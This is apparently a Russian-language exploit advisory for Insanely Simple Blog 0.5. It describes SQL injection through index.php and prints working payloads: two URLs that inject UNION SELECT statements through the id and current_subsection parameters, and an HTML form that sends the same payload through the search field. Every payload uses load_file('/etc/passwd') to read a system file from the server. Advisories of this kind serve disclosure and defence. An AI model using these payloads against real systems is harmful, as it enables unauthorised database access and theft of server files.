Программа: Insanely Simple Blog 0.5
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных сценарием index.php. Удаленный пользователь может с
помощью специально сформированного запроса выполнить произвольные SQL команды в
базе данных приложения.
Эксплоит:
http://localhost/isblog/index.php?id=-99+union+select+0,1,2,3,4,5,6,load_file('/etc/passwd'),8/*
http://localhost/isblog/index.php?current_subsection=
-99+union+select+0,1,2,3,4,5,6,load_file('/etc/passwd'),8/*
<form action="http://localhost/isblog/index.php?action=search" method="post">
<input type="hidden" name="term" value="-99' union select
0,1,2,3,4,5,6,load_file('/etc/passwd'),8/*">
<input type="submit" value="send">
</form>
